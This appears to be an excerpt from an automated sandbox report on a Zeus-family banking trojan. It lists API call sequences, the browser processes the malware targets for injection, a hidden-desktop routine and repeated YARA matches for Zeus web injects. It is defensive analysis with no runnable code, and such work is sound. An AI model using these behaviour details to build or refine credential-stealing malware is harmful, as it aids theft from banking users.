Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_01395890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_01395890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_01395890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01396370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01383510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|10_2_03226370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|10_2_03213510
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C786C0 CreateDesktopA,SetThreadDesktop,memset,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,SetThreadDesktop,memset,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,2_2_02C786C0

System Summary

Source: 2.3.svchost.exe.886000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.35.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 20.2.nPtwtzGyOdAtB.exe.13a2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.19.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.nPtwtzGyOdAtB.exe.2f62000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.nPtwtzGyOdAtB.exe.e72000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.nPtwtzGyOdAtB.exe.2cf0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 15.2.nPtwtzGyOdAtB.exe.2b52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.47.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 32.2.nPtwtzGyOdAtB.exe.26b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.WlCVLbzNph.exe.407000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.nPtwtzGyOdAtB.exe.3160000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.nPtwtzGyOdAtB.exe.1380000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.WlCVLbzNph.exe.5c82a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.44.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.5830000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.24.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.nPtwtzGyOdAtB.exe.1202000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.31.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.nPtwtzGyOdAtB.exe.2a60000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.13.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.WlCVLbzNph.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.nPtwtzGyOdAtB.exe.e72000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.38.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.46.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.nPtwtzGyOdAtB.exe.2d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.nPtwtzGyOdAtB.exe.1012000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.20.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.nPtwtzGyOdAtB.exe.2a52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.nPtwtzGyOdAtB.exe.29f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.nPtwtzGyOdAtB.exe.2d80000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.nPtwtzGyOdAtB.exe.1202000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1882456143.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.1916004272.0000000002A60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1962925986.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000023.00000002.2052985778.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000020.00000002.2064304121.0000000002840000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.1936970508.0000000001320000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1995104325.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1963615191.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
